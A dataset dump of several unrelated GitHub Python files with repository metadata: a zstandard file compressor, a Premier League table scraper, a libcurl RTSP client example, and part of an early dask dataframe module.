format signatures\"\"\"\n\n BZIP2 = b\"BZh\"\n LZIP = b\"LZIP\"\n RAR4 = b\"Rar!\\x1a\\x07\\x00\"\n RAR5 = b\"Rar!\\x1a\\x07\\x01\\x00\"\n GZIP = b\"\\x1F\\x8B\"\n ZSTANDARD = b\"(\\xb5/\\xfd\"\n\n\n@dataclasses.dataclass\nclass Compressor:\n \"\"\"Handles operations relating to file compression.\"\"\"\n\n algorithm: str = \"zstandard\"\n fmt_magic: dict = dataclasses.field(init=False)\n max_magic_len: int = dataclasses.field(init=False)\n\n def __post_init__(self):\n self.fmt_magic = {\n b\"\\x913HF\": \"hap\",\n b\"`\\xea\": \"arj\",\n b\"_'\\xa8\\x89\": \"jar\",\n b\"ZOO \": \"zoo\",\n b\"PK\\x03\\x04\": \"zip\",\n b\"\\x1F\\x8B\": \"gzip\",\n b\"UFA\\xc6\\xd2\\xc1\": \"ufa\",\n b\"StuffIt \": \"sit\",\n b\"Rar!\\x1a\\x07\\x00\": \"rar v4.x\",\n b\"Rar!\\x1a\\x07\\x01\\x00\": \"rar v5\",\n b\"MAr0\\x00\": \"mar\",\n b\"DMS!\": \"dms\",\n b\"CRUSH v\": \"cru\",\n b\"BZh\": \"bz2\",\n b\"-lh\": \"lha\",\n b\"(This 
fi\": \"hqx\",\n b\"!\\x12\": \"ain\",\n b\"\\x1a\\x0b\": \"pak\",\n b\"(\\xb5/\\xfd\": \"zst\",\n }\n self.max_magic_len = max(len(x) for x in self.fmt_magic)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, traceb):\n if exc_type is not None:\n traceback.print_exception(exc_type, exc_val, traceb)\n return False # uncomment to pass exception through\n\n return True\n\n # Static methods ###################### Static methods #\n @staticmethod\n def compress_file(\n file: pathlib.Path,\n chunk_size: int = FileSegment.SEGMENT_SIZE_RAW,\n ) -> bytes:\n \"\"\"Compresses file by reading it chunk by chunk.\"\"\"\n\n LOG.debug(\"Started compression...\")\n\n try:\n with file.open(mode=\"rb\") as infile:\n # Initiate a Zstandard compressor\n cctzx = zstd.ZstdCompressor(write_checksum=True, level=4)\n\n # total_read = 0.0\n # Compress file chunk by chunk while reading\n with cctzx.stream_reader(infile) as compressor:\n # while True:\n # chunk = compressor.read(chunk_size)\n # LOG.debug(type(chunk))\n # if not chunk:\n # break\n # yield\n for chunk in iter(lambda: compressor.read(chunk_size), b\"\"):\n yield chunk\n except Exception as err: # pylint: disable=broad-exception-caught\n LOG.warning(str(err))\n else:\n LOG.debug(\"Compression finished.\")\n\n @staticmethod\n def decompress_filechunks(chunks, outfile: pathlib.Path, **_):\n \"\"\"Decompress file chunks\"\"\"\n\n saved, message = (False, \"\")\n\n # Decompressing file and saving\n LOG.debug(\"Decompressing...\")\n try:\n with outfile.open(mode=\"wb+\") as file:\n dctx = zstd.ZstdDecompressor()\n with dctx.stream_writer(file) as decompressor:\n for chunk in chunks:\n decompressor.write(chunk)\n\n except OSError as err:\n message = str(err)\n LOG.exception(message)\n else:\n saved = True\n LOG.debug(\"Decompression done.\")\n\n return saved, message\n\n # Public methods ###################### Public methods #\n def is_compressed(self, file):\n \"\"\"Checks if a file is compressed or not.\"\"\"\n\n compressed, error = (False, \"\")\n try:\n with file.open(mode=\"rb\") as file_obj:\n file_start = file_obj.read(self.max_magic_len)\n if file_start.startswith(tuple(x for x in self.fmt_magic)):\n compressed = True\n except OSError as err:\n error = str(err)\n\n return compressed, error\n", "repo_name": "ScilifelabDataCentre/dds_cli", "sub_path": "dds_cli/file_compressor.py", "file_name": "file_compressor.py", "file_ext": "py", "file_size_in_byte": 4934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 47, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 48, "usage_type": "call"}, {"api_name": "traceback.print_exception", "line_number": 79, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "dds_cli.FileSegment.SEGMENT_SIZE_RAW", "line_number": 88, "usage_type": "attribute"}, {"api_name": "dds_cli.FileSegment", "line_number": 88, "usage_type": "name"}, {"api_name": "zstandard.ZstdCompressor", "line_number": 97, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "zstandard.ZstdDecompressor", "line_number": 125, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "19773863472", "text": "import requests\nfrom bs4 import 
BeautifulSoup as soup\nimport pandas as pd\nimport csv\npage = requests.get(\"https://www.skysports.com/premier-league-table\")\nsoups = soup(page.text,'html.parser')\ntable=[]\npoints=[]\nleague_table= soups.find('table', class_='standing-table__table')\nfor team in league_table.find_all('tbody'):\n rows = team.find_all('tr')\n for row in rows:\n pl_team = row.find(class_='standing-table__cell standing-table__cell--name')\n pl_points= row.find_all('td',class_=\"standing-table__cell\")[9]\n #print(pl_points.text)\n points.append(pl_points.text)\n table.append(pl_team.text.strip())\n #print(table)\n df1= pd.DataFrame(table,points)\n print (df1)", "repo_name": "Jatin666/premierleauge", "sub_path": "league-table.py", "file_name": "league-table.py", "file_ext": "py", "file_size_in_byte": 711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "8232480216", "text": "import sys\nimport re\nimport ctypes as ct\nfrom pathlib import Path\n\nimport libcurl as lcurl\nfrom curltestutils import * # noqa\n#include /* _getch() */\n\nhere = Path(__file__).resolve().parent\n\n\nOUT_DIR = here/\"output\"\nVERSION_STR = \"V1.0\"\n\n\ndef get_sdp_filepath(url: str) -> Path:\n # convert url into an sdp filename\n global OUT_DIR\n idx = url.rfind(\"/\")\n sdp_filename = (\"%s.sdp\" % url[idx + 1:]\n if idx != -1 and url[idx + 1:] else \"video.sdp\")\n return OUT_DIR/sdp_filename\n\n\n# error handling macros\n\ndef my_curl_easy_setopt(A, B, C):\n res: lcurl.CURLcode = lcurl.easy_setopt(A, B, C)\n if res != lcurl.CURLE_OK:\n print(\"libcurl.easy_setopt(%s, %s, %s) failed: %d\" %\n (A, B, C, res), file=sys.stderr)\n\ndef my_curl_easy_perform(A):\n res = lcurl.easy_perform(A)\n if res != lcurl.CURLE_OK:\n print(\"libcurl.easy_perform(%s) failed: %d\" %\n (A, res), file=sys.stderr)\n\n\n@lcurl.write_callback\ndef write_b_function(buffer, size, nitems, stream):\n file = lcurl.from_oid(stream)\n buffer_size = size * nitems\n if buffer_size == 0: return 0\n bwritten = bytes(buffer[:buffer_size])\n nwritten = file.write(bwritten)\n return nwritten\n\n\n@lcurl.write_callback\ndef write_function(buffer, size, nitems, stream):\n file = lcurl.from_oid(stream)\n buffer_size = size * nitems\n if buffer_size == 0: return 0\n bwritten = bytes(buffer[:buffer_size])\n nwritten = file.write(bwritten.decode(\"utf-8\"))\n return nwritten\n\n\ndef rtsp_options(curl: ct.POINTER(lcurl.CURL), uri: str):\n \"\"\"send RTSP OPTIONS request\"\"\"\n print(\"\\nRTSP: OPTIONS %s\" % uri)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_STREAM_URI,\n uri.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_OPTIONS)\n my_curl_easy_perform(curl)\n\n\ndef rtsp_describe(curl: ct.POINTER(lcurl.CURL), uri: str, sdp_filepath: Path):\n \"\"\"send RTSP DESCRIBE request and write sdp response to a file\"\"\"\n print(\"\\nRTSP: DESCRIBE %s\" % uri)\n try:\n sdp_fp = sdp_filepath.open(\"wb\")\n except:\n print(\"Could not open '%s' for writing\" % sdp_filepath,\n file=sys.stderr)\n sdp_fp = sys.stdout\n else:\n print(\"Writing SDP to '%s'\" % sdp_filepath)\n try:\n my_curl_easy_setopt(curl, lcurl.CURLOPT_WRITEFUNCTION, write_b_function)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_WRITEDATA, id(sdp_fp))\n 
my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_DESCRIBE)\n my_curl_easy_perform(curl)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_WRITEFUNCTION, write_function)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_WRITEDATA, id(sys.stdout))\n finally:\n if sdp_fp is not sys.stdout:\n sdp_fp.close()\n\n\ndef rtsp_setup(curl: ct.POINTER(lcurl.CURL), uri: str, transport: str):\n \"\"\"send RTSP SETUP request\"\"\"\n print(\"\\nRTSP: SETUP %s\" % uri)\n print(\" TRANSPORT %s\" % transport)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_STREAM_URI,\n uri.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_TRANSPORT,\n transport.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_SETUP)\n my_curl_easy_perform(curl)\n\n\ndef rtsp_play(curl: ct.POINTER(lcurl.CURL), uri: str, transfer_range: str):\n \"\"\"send RTSP PLAY request\"\"\"\n print(\"\\nRTSP: PLAY %s\" % uri)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_STREAM_URI,\n uri.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RANGE,\n transfer_range.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_PLAY)\n my_curl_easy_perform(curl)\n # switch off using range again\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RANGE, None)\n\n\ndef rtsp_teardown(curl: ct.POINTER(lcurl.CURL), uri: str):\n \"\"\"send RTSP TEARDOWN request\"\"\"\n print(\"\\nRTSP: TEARDOWN %s\" % uri)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_TEARDOWN)\n my_curl_easy_perform(curl)\n\n\ndef get_media_control_attribute(sdp_filepath: Path) -> str:\n # scan sdp file for media control attribute\n try:\n sdp_fp = sdp_filepath.open(\"rb\")\n except:\n return \"\"\n control = \"\"\n with sdp_fp:\n max_len = 256\n while True:\n chunk = sdp_fp.read(max_len)\n if not chunk: break\n match = re.match(rb\" a = control: (\\S+)\", chunk)\n if match:\n control = match.group(1).decode()\n return control\n\n\ndef main(argv=sys.argv[1:]):\n app_name = sys.argv[0].rpartition(\"/\")[2].rpartition(\"\\\\\")[2]\n global VERSION_STR\n\n if 1:\n # UDP\n transport = \"RTP/AVP;unicast;client_port=1234-1235\"\n else:\n # TCP\n transport = \"RTP/AVP/TCP;unicast;client_port=1234-1235\"\n transfer_range = \"0.000-\"\n\n print(\"\\nRTSP request %s\" % VERSION_STR)\n print(\" Project website: %s\" %\n \"https://github.com/BackupGGCode/rtsprequest\")\n print(\" Requires curl V7.20 or greater\\n\")\n\n # check command line\n if not (1 <= len(argv) <= 2):\n print(\"Usage: %s url [transport]\\n\" % app_name)\n print(\" url of video server\")\n print(\" transport (optional) specifier for media stream protocol\")\n print(\" default transport: %s\" % transport)\n print(\"Example: %s rtsp://192.168.0.2/media/video1\\n\" % app_name)\n\n return 1\n\n url: str = argv[0]\n if len(argv) >= 2: transport = argv[1]\n # lcurl.CURLcode res\n sdp_filepath: Path = get_sdp_filepath(url)\n\n # initialize curl\n res = lcurl.global_init(lcurl.CURL_GLOBAL_ALL)\n # initialize this curl session\n curl: ct.POINTER(lcurl.CURL) = lcurl.easy_init()\n\n with curl_guard(True, curl):\n if res != lcurl.CURLE_OK:\n print(\"curl_global_init(%s) failed: %d\" %\n (\"CURL_GLOBAL_ALL\", res), file=sys.stderr)\n return 1\n if not curl:\n print(\"curl_easy_init() failed\", file=sys.stderr)\n return 1\n\n ver = lcurl.version_info(lcurl.CURLVERSION_NOW).contents\n print(\" curl V%s loaded\" % ver.version, file=sys.stderr)\n\n my_curl_easy_setopt(curl, lcurl.CURLOPT_VERBOSE, 0)\n my_curl_easy_setopt(curl, 
lcurl.CURLOPT_NOPROGRESS, 1)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_HEADERFUNCTION, write_function)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_HEADERDATA, id(sys.stdout))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_URL, url.encode(\"utf-8\"))\n\n # request server options\n uri = \"%s\" % url\n rtsp_options(curl, uri)\n\n # request session description and write response to sdp file\n rtsp_describe(curl, uri, sdp_filepath)\n\n # get media control attribute from sdp file\n control = get_media_control_attribute(sdp_filepath)\n\n # setup media stream\n uri = \"%s/%s\" % (url, control)\n rtsp_setup(curl, uri, transport)\n\n # start playing media stream\n uri = \"%s/\" % url\n rtsp_play(curl, uri, transfer_range)\n input(\"Playing video, press any key to stop ...\")\n print()\n\n # teardown session\n rtsp_teardown(curl, uri)\n\n return 0\n\n\nsys.exit(main())\n", "repo_name": "karpierz/libcurl", "sub_path": "examples/rtsp.py", "file_name": "rtsp.py", "file_ext": "py", "file_size_in_byte": 7559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "name"}, {"api_name": "libcurl.CURLcode", "line_number": 29, "usage_type": "attribute"}, {"api_name": "libcurl.easy_setopt", "line_number": 29, "usage_type": "call"}, {"api_name": "libcurl.CURLE_OK", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 32, "usage_type": "attribute"}, {"api_name": "libcurl.easy_perform", "line_number": 35, "usage_type": "call"}, {"api_name": "libcurl.CURLE_OK", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 38, "usage_type": "attribute"}, {"api_name": "libcurl.from_oid", "line_number": 43, "usage_type": "call"}, {"api_name": "libcurl.write_callback", "line_number": 41, "usage_type": "attribute"}, {"api_name": "libcurl.from_oid", "line_number": 53, "usage_type": "call"}, {"api_name": "libcurl.write_callback", "line_number": 51, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 61, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 61, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_STREAM_URI", "line_number": 64, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 66, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_OPTIONS", "line_number": 67, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 71, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 71, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 78, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 79, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_WRITEFUNCTION", "line_number": 83, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_WRITEDATA", "line_number": 84, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 85, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_DESCRIBE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_WRITEFUNCTION", "line_number": 88, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_WRITEDATA", "line_number": 89, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 89, "usage_type": "attribute"}, 
{"api_name": "sys.stdout", "line_number": 91, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 95, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 95, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_STREAM_URI", "line_number": 99, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_TRANSPORT", "line_number": 101, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 103, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_SETUP", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 108, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 108, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_STREAM_URI", "line_number": 111, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RANGE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 115, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_PLAY", "line_number": 116, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RANGE", "line_number": 119, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 122, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 122, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 125, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_TEARDOWN", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 130, "usage_type": "name"}, {"api_name": "re.match", "line_number": 142, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 178, "usage_type": "name"}, {"api_name": "libcurl.global_init", "line_number": 181, "usage_type": "call"}, {"api_name": "libcurl.CURL_GLOBAL_ALL", "line_number": 181, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 183, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 183, "usage_type": "attribute"}, {"api_name": "libcurl.easy_init", "line_number": 183, "usage_type": "call"}, {"api_name": "libcurl.CURLE_OK", "line_number": 186, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 188, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 191, "usage_type": "attribute"}, {"api_name": "libcurl.version_info", "line_number": 194, "usage_type": "call"}, {"api_name": "libcurl.CURLVERSION_NOW", "line_number": 194, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 195, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_VERBOSE", "line_number": 197, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_NOPROGRESS", "line_number": 198, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_HEADERFUNCTION", "line_number": 199, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_HEADERDATA", "line_number": 200, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 200, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_URL", "line_number": 201, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 229, "usage_type": "call"}]} +{"seq_id": "39913285532", "text": "from __future__ import division\n\nimport bisect\nfrom collections import Iterable, Iterator\nfrom datetime import datetime\nfrom distutils.version import 
LooseVersion\nfrom functools import wraps\nimport operator\nfrom operator import getitem, setitem\nfrom pprint import pformat\nimport uuid\n\nfrom toolz import merge, partial, first, partition, unique\nimport pandas as pd\nfrom pandas.util.decorators import cache_readonly\nimport numpy as np\n\ntry:\n from chest import Chest as Cache\nexcept ImportError:\n Cache = dict\n\nfrom .. import array as da\nfrom .. import core\nfrom ..array.core import partial_by_order\nfrom .. import threaded\nfrom ..compatibility import unicode, apply, operator_div, bind_method\nfrom ..utils import repr_long_list, IndexCallable, pseudorandom\nfrom .utils import shard_df_on_index\nfrom ..base import Base, compute, tokenize, normalize_token\n\nno_default = '__no_default__'\nreturn_scalar = '__return_scalar__'\n\npd.computation.expressions.set_use_numexpr(False)\n\ndef _concat(args, **kwargs):\n \"\"\" Generic concat operation \"\"\"\n if not args:\n return args\n if isinstance(first(core.flatten(args)), np.ndarray):\n return da.core.concatenate3(args)\n if len(args) == 1:\n return args[0]\n if isinstance(args[0], (pd.DataFrame, pd.Series)):\n args2 = [arg for arg in args if len(arg)]\n if not args2:\n return args[0]\n return pd.concat(args2)\n if isinstance(args[0], (pd.Index)):\n args = [arg for arg in args if len(arg)]\n result = pd.concat(map(pd.Series, args))\n result = type(args[0])(result.values)\n result.name = args[0].name\n return result\n return args\n\n\ndef optimize(dsk, keys):\n from .optimize import optimize\n return optimize(dsk, keys)\n\n\ndef finalize(self, results):\n return _concat(results)\n\n\nclass Scalar(Base):\n \"\"\" A Dask-thing to represent a scalar\n\n TODO: Clean up this abstraction\n \"\"\"\n\n _optimize = staticmethod(optimize)\n _default_get = staticmethod(threaded.get)\n _finalize = staticmethod(finalize)\n\n def __init__(self, dsk, _name, name=None, divisions=None):\n self.dask = dsk\n self._name = _name\n self.divisions = [None, None]\n\n # name and divisions are ignored.\n # There are dummies to be compat with Series and DataFrame\n\n def __array__(self):\n # array interface is required to support pandas instance + Scalar\n # Otherwise, above op results in pd.Series of Scalar (object dtype)\n return np.asarray(self.compute())\n\n @property\n def _args(self):\n return (self.dask, self._name)\n\n def _keys(self):\n return [(self._name, 0)]\n\n @classmethod\n def _get_unary_operator(cls, op):\n def f(self):\n name = tokenize(self)\n dsk = {(name, 0): (op, (self._name, 0))}\n return Scalar(merge(dsk, self.dask), name)\n return f\n\n @classmethod\n def _get_binary_operator(cls, op, inv=False):\n return lambda self, other: _scalar_binary(op, self, other, inv=inv)\n\n\ndef _scalar_binary(op, a, b, inv=False):\n name = '{0}-{1}'.format(op.__name__, tokenize(a, b))\n\n dsk = a.dask\n if not isinstance(b, Base):\n pass\n elif isinstance(b, Scalar):\n dsk = merge(dsk, b.dask)\n b = (b._name, 0)\n else:\n return NotImplemented\n\n if inv:\n dsk.update({(name, 0): (op, b, (a._name, 0))})\n else:\n dsk.update({(name, 0): (op, (a._name, 0), b)})\n\n if isinstance(b, pd.Series):\n return Series(dsk, name, b.name, [b.index.min(), b.index.max()])\n elif isinstance(b, pd.DataFrame):\n return DataFrame(dsk, name, b.columns, [b.index.min(), b.index.max()])\n else:\n return Scalar(dsk, name)\n\n\nclass _Frame(Base):\n \"\"\" Superclass for DataFrame and Series \"\"\"\n\n _optimize = staticmethod(optimize)\n _default_get = staticmethod(threaded.get)\n _finalize = staticmethod(finalize)\n\n # 
constructor properties\n # http://pandas.pydata.org/pandas-docs/stable/internals.html#override-constructor-properties\n\n @property\n def _constructor_sliced(self):\n \"\"\"Constructor used when a result has one lower dimension(s) as the original\"\"\"\n raise NotImplementedError\n\n @property\n def _constructor(self):\n \"\"\"Constructor used when a result has the same dimension(s) as the original\"\"\"\n raise NotImplementedError\n\n @property\n def npartitions(self):\n \"\"\"Return number of partitions\"\"\"\n return len(self.divisions) - 1\n\n def _keys(self):\n return [(self._name, i) for i in range(self.npartitions)]\n\n @property\n def index(self):\n \"\"\"Return dask Index instance\"\"\"\n name = self._name + '-index'\n dsk = dict(((name, i), (getattr, key, 'index'))\n for i, key in enumerate(self._keys()))\n return Index(merge(dsk, self.dask), name, None, self.divisions)\n\n @property\n def known_divisions(self):\n \"\"\"Whether divisions are already known\"\"\"\n return len(self.divisions) > 0 and self.divisions[0] is not None\n\n def get_division(self, n):\n \"\"\" Get nth division of the data \"\"\"\n if 0 <= n < self.npartitions:\n name = 'get-division-%s-%s' % (str(n), self._name)\n dsk = {(name, 0): (self._name, n)}\n divisions = self.divisions[n:n+2]\n return self._constructor(merge(self.dask, dsk), name,\n self.column_info, divisions)\n else:\n msg = \"n must be 0 <= n < {0}\".format(self.npartitions)\n raise ValueError(msg)\n\n def cache(self, cache=Cache):\n \"\"\" Evaluate Dataframe and store in local cache\n\n Uses chest by default to store data on disk\n \"\"\"\n if callable(cache):\n cache = cache()\n\n # Evaluate and store in cache\n name = 'cache' + uuid.uuid1().hex\n dsk = dict(((name, i), (setitem, cache, (tuple, list(key)), key))\n for i, key in enumerate(self._keys()))\n self._get(merge(dsk, self.dask), list(dsk.keys()))\n\n # Create new dataFrame pointing to that cache\n name = 'from-cache-' + self._name\n dsk2 = dict(((name, i), (getitem, cache, (tuple, list(key))))\n for i, key in enumerate(self._keys()))\n return self._constructor(dsk2, name, self.column_info, self.divisions)\n\n @wraps(pd.DataFrame.drop_duplicates)\n def drop_duplicates(self):\n chunk = lambda s: s.drop_duplicates()\n return aca(self, chunk=chunk, aggregate=chunk, columns=self.column_info,\n token='drop-duplicates')\n\n def __len__(self):\n return reduction(self, len, np.sum, token='len').compute()\n\n def map_partitions(self, func, columns=no_default, *args, **kwargs):\n \"\"\" Apply Python function on each DataFrame block\n\n When using ``map_partitions`` you should provide either the column\n names (if the result is a DataFrame) or the name of the Series (if the\n result is a Series). The output type will be determined by the type of\n ``columns``.\n\n >>> df.map_partitions(lambda df: df.x + 1, columns='x') # doctest: +SKIP\n\n >>> df.map_partitions(lambda df: df.head(), columns=df.columns) # doctest: +SKIP\n\n Parameters\n ----------\n\n func: function\n Function applied to each blocks\n columns: tuple or scalar\n Column names or name of the output. Defaults to names of data itself.\n When tuple is passed, DataFrame is returned. 
When scalar is passed,\n Series is returned.\n \"\"\"\n if columns == no_default:\n columns = self.column_info\n return map_partitions(func, columns, self, *args, **kwargs)\n\n def random_split(self, p, seed=None):\n \"\"\" Pseudorandomly split dataframe into different pieces row-wise\n\n 50/50 split\n >>> a, b = df.random_split([0.5, 0.5]) # doctest: +SKIP\n\n 80/10/10 split, consistent seed\n >>> a, b, c = df.random_split([0.8, 0.1, 0.1], seed=123) # doctest: +SKIP\n \"\"\"\n seeds = np.random.RandomState(seed).randint(0, np.iinfo(np.int32).max,\n self.npartitions)\n dsk_full = dict(((self._name + '-split-full', i),\n (pd_split, (self._name, i), p, seed))\n for i, seed in enumerate(seeds))\n\n dsks = [dict(((self._name + '-split-%d' % i, j),\n (getitem, (self._name + '-split-full', j), i))\n for j in range(self.npartitions))\n for i in range(len(p))]\n return [type(self)(merge(self.dask, dsk_full, dsk),\n self._name + '-split-%d' % i,\n self.column_info,\n self.divisions)\n for i, dsk in enumerate(dsks)]\n\n def head(self, n=5, compute=True):\n \"\"\" First n rows of the dataset\n\n Caveat, the only checks the first n rows of the first partition.\n \"\"\"\n name = 'head-%d-%s' % (n, self._name)\n dsk = {(name, 0): (lambda x, n: x.head(n=n), (self._name, 0), n)}\n\n result = self._constructor(merge(self.dask, dsk), name,\n self.column_info, self.divisions[:2])\n\n if compute:\n result = result.compute()\n return result\n\n def tail(self, n=5, compute=True):\n \"\"\" Last n rows of the dataset\n\n Caveat, the only checks the last n rows of the last partition.\n \"\"\"\n name = 'tail-%d-%s' % (n, self._name)\n dsk = {(name, 0): (lambda x, n: x.tail(n=n),\n (self._name, self.npartitions - 1), n)}\n\n result = self._constructor(merge(self.dask, dsk), name,\n self.column_info, self.divisions[-2:])\n\n if compute:\n result = result.compute()\n return result\n\n def _loc(self, ind):\n \"\"\" Helper function for the .loc accessor \"\"\"\n if isinstance(ind, Series):\n return self._loc_series(ind)\n elif isinstance(ind, slice):\n return self._loc_slice(ind)\n else:\n return self._loc_element(ind)\n\n def _loc_series(self, ind):\n if not self.divisions == ind.divisions:\n raise ValueError(\"Partitions of dataframe and index not the same\")\n return map_partitions(lambda df, ind: df.loc[ind],\n self.columns, self, ind, token='loc-series')\n\n def _loc_element(self, ind):\n name = 'loc-element-%s-%s' % (str(ind), self._name)\n part = _partition_of_index_value(self.divisions, ind)\n if ind < self.divisions[0] or ind > self.divisions[-1]:\n raise KeyError('the label [%s] is not in the index' % str(ind))\n dsk = {(name, 0): (lambda df: df.loc[ind], (self._name, part))}\n\n if self.ndim == 1:\n columns = self.column_info\n else:\n columns = ind\n return self._constructor_sliced(merge(self.dask, dsk), name,\n columns, [ind, ind])\n\n def _loc_slice(self, ind):\n name = 'loc-slice-%s-%s' % (str(ind), self._name)\n assert ind.step in (None, 1)\n if ind.start:\n start = _partition_of_index_value(self.divisions, ind.start)\n else:\n start = 0\n if ind.stop is not None:\n stop = _partition_of_index_value(self.divisions, ind.stop)\n else:\n stop = self.npartitions - 1\n istart = _coerce_loc_index(self.divisions, ind.start)\n istop = _coerce_loc_index(self.divisions, ind.stop)\n if stop == start:\n dsk = {(name, 0): (_loc, (self._name, start), ind.start, ind.stop)}\n divisions = [istart, istop]\n else:\n dsk = merge(\n {(name, 0): (_loc, (self._name, start), ind.start, None)},\n dict(((name, i), (self._name, 
